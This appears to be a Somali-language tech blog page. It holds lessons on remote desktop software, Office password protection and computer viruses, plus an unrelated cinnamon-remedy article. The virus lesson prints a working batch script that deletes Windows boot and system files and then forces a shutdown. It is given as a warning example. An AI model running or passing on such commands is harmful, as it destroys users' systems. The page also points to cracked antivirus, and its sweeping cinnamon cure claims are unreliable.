One Click Many Information

Somali Computer Technology waxaad ka helaysaa casharo kala duwan kuwaas oo ah kuwa Tayaysan wakhti kasta waa Channel u Taagan inuu u Faaiideeyo umada Somaaliyeed Meelkasta oo ay daafaha Caalamka ka kala Joogto Si hagar la'aan ah

Tuesday, March 1, 2016

COMPUTER KAAGA KU DHEX FUR FUR COMPUTER KALE KANA MAARAN COMPUTER AAD SI TOOSA U FUR FURTO SOFTWARE KAN AYAA KUU SAHLAYA



Asc asxaabtayda qaaliga ahxilqadeena maanta waxaan kusoo qaadanaynaa sidii computer aad u furfuri lahayd kadibna aad isku xidh xidhi lahayd mar labaad adigoon isticmaalayn computer aad si toosa u fur furi lahayd waxaanad isticmaalaysaa software lagu magacaabo IT ESSENTIAL VIRTUAL DESCKTOP markaa si aad uga faaiidaysato barnaamijkan macluumaad kiisa daawo video gan hoose kadibna adigu samee waxaanad barnaamijkan ka soo download garaysanaysaa video ga hoostiisa link ga aan kuu dhigay
fadlan markaa ha igala bakhaylin inaad like garayso casharkan aan idinku tala galay waxaanad igala socon kartaan web kaygan dhiilood.blogspot.com ama channel kayga aan kuleeyahay youtube ee abdikariim jr ama facebook page kayga dhiilood 2016 hadaba lasocosho wanaagsan



                     
Waxaa video gan kuu diyaariyay anigoo ah Abdikariem mahamoud ahmed fadlan share and like
ku samee casharkan si ay uga faaiidaystaan walaalaheena muslimka si uu u anfaco adiguna kuu anfaco mahadsanidiin





Daawo Muhiima ( Isku Daaweynta Qorfaha )



Qorfuhu waa dhir cunto oo aad u udgoon isla markaana dhadhan fiican leh. Waxaa qorfaha daawo ahaan loo isticmaali jiray mudo kumaan sano ah waa loo aaminsanaa inuu yahay daawo dhaqameed caafimaad badan. Waxaa jirtay waqti qorfuhu ka qiimo badnaa dahabka!.
Sayniska casriga ah ayaa ka markhaati kacay dhaqankaas soo jireenka ah waxaana la xaqiiyay in qorfuhu yahay daawo waxtarka badan
Hadaba waxaynu halkaan kusoo qaadanaya qaar ka mid ah faaidooyinka qorfaha ee ay saynisyahannadu ku ogaadeen cilmi baarista.
Faaidooyin ugu muhiimsan ee  qorfaha ayaa la sheegaa inay ku jirto saliida laga miiro geedkaan.


  1. Kontaroolka sonkorta dhiiga:
Qorfuhu wuxuu faaidooyin  muhiim ah u leeyahay dadka qaba sonkorta gaar ahaan nooca labaad (Type 2 Diabetes). Waxaa qorfaha ku jirta maadada loo yaqaan “Cinnamaldehyde” oo sonkorta dajisa.
2. Kobcinta shaqada maskaxda:
Waxaa la arkay in qorfuhu kobciyo feejignaanta, wuxuu kaloo u fiican yahay xusuusta. Ardayda dareenta walaaca iyo isku yaacsanaanta xilliyada imtixaanka ayaa lagula taliyaa inay cabaan shaah qorfe lagu daray subaxa hore, wuxuu dajiyaa maskaxda.
3. Ka hortagga cuddurada wadnaha:
Qorfuhu waxa uu wadnaha ka ilaaliya in waxyeello iyo infakshan ku dhacaan, Cuntada fudud ee dadku inta badan cunaan waxaa ku jira kolesterool iyo dufanka caafimaadka u daran. Qorfuhu wuxuu dagaallamaa kolesteroolka xun, wuxuuna ka hortagaa in xididdada dhiiggu xirmaan, waxaa kale oo uu yareeyaa khatarta wadne xanuunka.
4. Shaqada Xiidmaha:
Qorfaha waxaa ku jira Kalshiyaam iyo fiber oo muhiim u ah shaqada xiidmaha. Fiber waxaa aa uu ka hortagaa kansarka xiidmaha.
Fiber wuxuu si gaar ah uu bogsiiyaa calaamadaha xanuunka malawadka kacsan ee afka qalaad lagu yiraahdo “Irritable Bowel Syndrome” ama IBS waana cudurka ugu badan ee keena xanuunka xiidmaha iyo malawadka, calaamadaha lagu karto waxaa ka mid ah shuban, calool fadhi, calool xanuun, dibiro iyo dhuuso badan.
5. Ka hortagga cudurrada maskaxda:
Qorfuhu waxuu daawo iyo ka hortag u noqon karaa xanuun maskaxda ku dhaca,  sida Alzheimer’s, burooyinka maskaxda iyo Parkinson oo ah cudur ku bilowda burburka unugyada maskaxda ee dareen wadayaasha ah .
6. Xanuunka caadada: Shaah qorfe leh oo aad cabtaa maalmaha caadadu soo so dhowdahay ama maalinta koobaad waxay yareysaa  xanuunka caadada.
7. Yarenta lafo xanuunka:
Waxaa la arkay in qorfuhu yareeyo xanuunka lafaha gaar ahaan kalagoysyada.
Waxaa Tijaabo lagu sameeyay bukaano qabay bararka kala goysyada oo aan socon karin, waxaa la siiyay qaado barkeed qorfe budo ah iyo qaado malab ah subax kasta quraacda ka hor waxaana lagu arkay isbeddel weyn mudo asbuuc gudihiis ah, bil gudaheedna socodkii ayay dib ugu bilaabeen.
8. Wareegga dhiiga:
Qorfuha waxaa ku jirta maado la yiraahdo “coumarin” oo hagaajisa wareegga dhiiga ee jirka oo dhan.
Waxaa muhiim inaad ogaatid qorfaha oo la isku badiyaa waxay dhaawici kartaa beerka waxayna horseedi kartaa inuu howlgab noqdo!.
9. Hargabka:
Qorfuhu waxaa u ka mid yahay waxyaabaha dabiiciga ee lagula tacaalo hargabka iyo ifilada. Wuxuu yareeyaa cune xanuunka. Waxaad isku darsan kartaa hal ama labo qaado oo qorfe budo ah iyo shaaha cagaaran.
Qufaca iyo ifila waxaa kaloo lagu daaweeyaa in la cabbo isku-darka biyo dirran, malab iyo qorfe, quraacda kadib iyo habeenkii intaan la seexan ka hor.
10. Caafimaadka afka:
Qorfuhu waxaa uu dilaa jeermiska keena suuska waxaana uu la dagaallamaa caabuqa cirridka  iyo huurada, afkana wuu carfiyaa.


Fadlan hadii aad ka heshay xalqadeenan maanta like and share and subscribe samee si ay uga faaiidaan asxaabteena kale aan arag casharka waa mahadsantihiin


SUBSCRIBE YOUTUBE CHANNELHALKAN GUJI 
Facebook Page HALKAN GUJI
INSTAGRAM : HALKAN GUJI
GOOGLE + : HALKAN GUJI



                                   Waxaa idiin soo diyaariyay Abdikariem Mahamoud

SIDEE PASSWORD UGU XIDHI KARTAA MICROSOFT OFFICE 2007 DOCUMENTS

sidee password ugu xiri kartaa Microsoft Office 2007 Documents
waxaad password ku xiri kartaa warqadaha ama dukumentiyada adiga kuu khaaska ah ee computerkaaga ku jira ee ku qoran microsoft office 2007 .
Hadii aad tahay qof isticmaala Microsoft Office 2007,wixii dukimenti aad  sameysid waxaad dooneysaa in dadka kale ee kula isticmaala computerka aaaney eegin, hadaba casharkan waxaan ku baran doonaa sida baaswoorka loogu xiro Microsoft Office Document.
Microsoft xoogaa wey yara bedeleen, hadii loo eego Microsoft Office 2003. hadaba sawirada iyo qoraalka hoos ku yaal sii raac, si aad baaswoor ugu xirtid dukimintigaada qaaska kuu ah.
1- Riix Microsoft Office  Button- ka dibna dheh Save as
2- Ka dib riix Tools adigoo dooranaya General Options
3-  Hadii aad dooneysid in qof kale uu furan karo dukomentigan, waxaad siin kartaa Baaswoorka.
     iyo adigoo isla markaana sameysan kara baaswoor kuu gooni ah.
4- Xataa waxaad dooran kartaa Aqri keliya ama Read-only , kaasoo isla markaana baaswoor aad gelin kartid
Kadib wuxuu kuu noqon doonaa file adiga kuu khaasa 
waxaa casharkan kuu fudaydiyay Abdikariem mahamoud ahmed PLz like and share this lesson

WAA MAXAY VIRUS SIDEE U XALINKARAA WAXYEELADIISA

Waa maxay virus ?


Virus waa barnaamij loo sameeyay in lagu wax yeeleeyo dadka internetka soo gala ee  macluumaadka isku dhaafsada , barnaamijkaas oo kaa tir tiraya ama qaribaya ama qarinayaba wixii computerkaaga kuugu jiray oo muhimka ahaa haday yihiin sawiro , qoraalo ,ama videos iyo wixii la mida . viurksaas waxaa mararka qaarkood uu keenaa in computerkaaga damo oo laga quusto ilaa la format gareeyo maahee , waxaa kaloo dhici karta in crash uu noqo computerkaaga oo wax barnaamij ah oo computerkaaga ku jira uusan kuu shaqayn.
Halkee ka Yimaadaa virusku ?
Virusku waxa uu ka yimaadaa dhanka internetka viruskaas oo la iskugu diro website yada tusaale ahaan adoo raadinaya macluumaad ama aqoon kororsi ayaad arkaysaa meel ay ku qoran tahayDownload garayso software kaan waa muhim , kadib software kii aad sidaas usoo dagsatay aad ku dhex furtay computerkaaga .
ana waxa kuu soo baxaya update adobe reader task barka dhanka hoose ee computerka kadibna aad update ku dhufatay . waxaa kaloo la iskugu diraa viruska dhanka inboxka hotmail ,Gmail iyo wixii la mid ah 

Qaybaha Virusku u kala qaybsamo 
aad uu u qaybo badan yahay virusku lkn waxaan ka soo qaadan doonaa ilaa 4 nooc oo viruska ah iyo wax yeeladiisa anagoo qaar kood ku dari doona sida loo xaliyo waxyeelada viruska .
1- Brontok :    Viruskaan waxuu qariyaa dhamaan faylashii kuugu jiray computerkaaga ama falaashkaaga viruskaas oo aad u faafa kuna  kala gudba internetka iyo USB yada la galiyay internetka .
Waxaa jia softwaro makra ay kugu dhacdo ciladaan oo kale oo ay kaa qarsoomaan faylashii ama barnaamijtii kuugu jirtay flashkaaga ama memory gaaga aad usoo ceshan lahayd .
Software kaan waxaa loo yaqaan Show hiden  sidaad usoo dhagsatid RIIX halkaan .
2- Xcopy:     Viruskaan waxa uu ku dhacaa qaybta partation ka ama Drives ka .Viruskaan oo ku dhex abuuraya gudaha dareve ka file yar oo ay ku qoran tahay Autorun kaas oo aadan furi karin folderka asagoo markaad ku dul dhufatid muuska ku dhahaya OPEN WITH… .
3- Trivial :  Viruskaan dhib wayn uma keenayo computerkaaga haduu  galo hal ama labo xabo . lkn waxa uu dhib leeyahay marka asagoo badan uu galo computerkaaga . dhib wayn makeeno sida Viruska loo yaqaan stupid .
4-Moderate :   Viruskaan waxa uu tir tiraa dhamaan faylasha kuugu jira Drive ka marka uu galo falashkaaga ama Memory gaaga ku dhahaya Reformatting ama  ØªÙ‡ÙŠØ© Yacnii format garee  . waa sida viruska Disk killer ee Driveyada ku sameeya formatinka .
kaasna waxaad ku xalin kartaa haduu kaa galo computerkaaga waa in aad leedahay Back up ama Ù†Ø³Ø®Ø© إحتياطية .
Aad ayay u fara badan yihiin noocyada viruska iyo qaybihiisa anagon awoodin in aan halkaan idinkugu soo wada ban dhigno .
Yaa sameeya Viruska sa muxuu ka samaysan yahay ?
waxaa sameeya viruska Dadka ku takhasusay ama yaqaana cilmiga programming ka , wuxuu ka samaysan yahay virusku xarfo iyo nambaro lagu amrayo computerka in uu tirtiro wixii ku dhex jira ama qariyo faylasha ku dhex jira ama oo Crash ka dhigo wixii computerkaas ku jira .
Tusaale :
@ echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.iniattrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini @ echo off msg * You Got Owned” shutdown -s -t7 -c ”Virus ayaa ku haleelay”
Iska ilaali xarfahaan waa virus . lkn maahan mid hada wax yeelo kuu keenaya ilaa aad Note pad ku past garaysid .
Sidee uga hor tagi karnaa Viruska ?
Waa su,aal muhim ah in la is waydiiyo maadaama aan baranay ama wax ka ogaanay virusku waxa uu yahay iyo dhibaatooyinkuu keeno , hadana waxaa muhim ah in aad ogaatid dhibaatooyinkaas sidaan uga hor tagi lahayn .
Barnaamijyada looga hor tago Viruska waxaa loo yaqaan Anti-virus ama Virus ka hor tage .
Waxaa jira Boqolaal shirkadood oo ka ganacsada Anti-virus yada qaarkoodna ayba sameeyaan Viruska .
hadaba waxaan balkaan idinku tusinayaa Shirkadaha ugu awooda badan sanadaan 2013 ee dunida la ga isticmaalo .
waxaan halkaaan ku soo bandhigaynaa 5 ta Anti-virus ee ugu awooda badan oo loogu isticmaal badan yahay dunida :
bitdefender waxaan dhihi karaa waa number 1 calaamaka oo dil waana Anti-viruska ugu awooda badan dunida looguna isticmaal badan yahay .
waxaa jira asagoo Crack ah oo bilaash aad ku helaysid mudo 3  ama 5 am 7 sano ah amaba ka badan  asagoo ah Bitdefender Antivirus  2013  .
waxa uu u qayb samaa Bitdefender Sedex qaybood oo kala ah :
nooca ugu wanaagsan ama la dhihi karo waa ugu fiican yahay waa kan ugu sareeya ee  Bitdefender total security
Ka soo Downlaod Garayso ahalkaan :
MUHIIM: Ku duubista iyo Activationka Softweerkan Bitdefender Total Security 2013 waxaa la socda VIDEO ee daawo si uu kuugu fududaado ku duubitsa. Website ka solagroups waa website somali ah oo macluumaad badan aad ka heli kartid lkn waxaa lagama maar maan ah iska diiwaan gali website ka Register  sanadkii dhan waa 12$ ku dhufo halkaan sidad iskaga diiwaan galisidSolagroups.com
2-   Kaspersky Anti-Virus 2013 
Labada kaalmood ee ugu horeeya dunida waxaa qaaday labada shirdood ee kala ah Bitdefender iyo Kaspersky waana labada shirkadood ee ugu haysta dunida  oo loogu isticmaal badan yahay .
Ka soo Download Garayso halkaan :
3-    ESET NOD32 Antivirus 6
waxa uu ka mid yahay anti-viruskaan Anti-virus yada ugu awooda badan in kastoo laga horeeyo . waxaad ka helaysaa asagoo bilaash ah webite yada hoose .
Ka soo Download Garayso halkaan :
Nod32 antivirus 7.0.28.0 beta
Ka soo Dagso halkaan noocyadiisa kala duwan free Downlaod

[ NOD32 6.0.316.0 – 32-bit ]

…………………………………………………………………….

[ NOD32 6.0.316.0 – 64-bit ]

…………………………………………………………………….

[ NOD32 Antivirus Updates ]

…………………………………………………………………….

[ NOD32 Antivirus 7.0.28.0 Beta – 32-bit ]

…………………………………………………………………….

[ NOD32 Antivirus 7.0.28.0 Beta – 64-bit ]

…………………………………………………………………….
4-    AVG Antivirus Professional 2013
AVG  waxa uu ka mid yahay Anti-virus yada ugu awooda badan waxa uuna kaa ilaalinayaa dhamaan noocyada kala duwan ee viruska waxaad jira cashar aan horay uga samaynay AVG Internet Security  . Halkaan Riix .
Ka soo Downlaod Garayso Halkaan :
A- Soo Downlaod gareyso 32 bit

http://www.avg.com/download-file-x86-triisc-huawei

B- Soo Downlaod garayso 64 bit

http://www.avg.com/download-file-x64-triisc-huawei

Macluumaad ku saabsan Avg Sidaad u ogaato Halkaan Gujji
5-    Avira Antivirus Premium 2013
Avira Antivirus waxaa uu ka mid yahay anti virus yada looga hor tago Viruska soo Hujuuma Computerkaaga kaas oo owdaya meelaha uu ka soo hujuuma xirayana albaabada uu ka soo galo .
Ka soo Download Garayso Halkaan :
Hadaad rabtid in aad wax ka ogaatid Macluumaad dheeri ah oo ku saabsan Viruska waxaan halkaan kusoo  diyaariyay link Website yada somaalida ee wax ka qoray Virus iyo wixii la halmaala 
2- Waa maxay waxayaabaha waxyeeleeya aaladaha Electronic ka ah .  waxaa ka soo xigtay Websiteka axmahaajir.wordpress.com sidaad u akhrisid waxa laga qoray Halkaan Riix sidaad u gashid 
3- Mooryaanta internetka  waxaa wax ka qoray Website ka caanka ah ee somalitalk.com 
4- Waa maxay firewall waxaa wax ka qoray ayadana websiteka barashada computerka eeAqoonkaal.net  ama Aqoonkaal.com waa isku mid Halkaan Riix sidaad u gashid  .
Hadaba waxaad barateen waxa uu yahay Virus hadaba ma ogatahay in uu jiro Viruska Dadka  dabcan way kala duwan yihiin Viruska dadka waa waxa loo yaqaan afka soomaaliga Jadeeco Aqoontaada kororso oo ogow waxa ay ku kala duwan yihiin sidaad u ogaatid  Halkaan Riix sidaad u gashid . 
HADABA AKHRISTE WAXA CASHARKAN KU SOO DIYAARIYAY ABDIKARIEM MAHAMOUD AHMED
WAANA CASHAR AAD U FAAIIDO BADAN KUWAN IYO KUWA KALEBA WAXAAD KAL SOCON DOONTAA WEBKEENAN DHIILOOD.BLOGSPOT.COM AMA CHANNELKA AAN KU LEEYAHAY YOUTUBE EE
                                            YOUTUBE CHANNEL ABDIKARIEM DHIILOOD JR
                                                                             AMA 
                                                     FACEBOOK PAGE DHIILOOD 2016
                                                           PLEASE LIKE AND SHARE
WIXII CASHARKA AH EE COMMENT AH KUSOO GUDBI HALKA HOOSE EE WEBKA MAHADSANIDIIN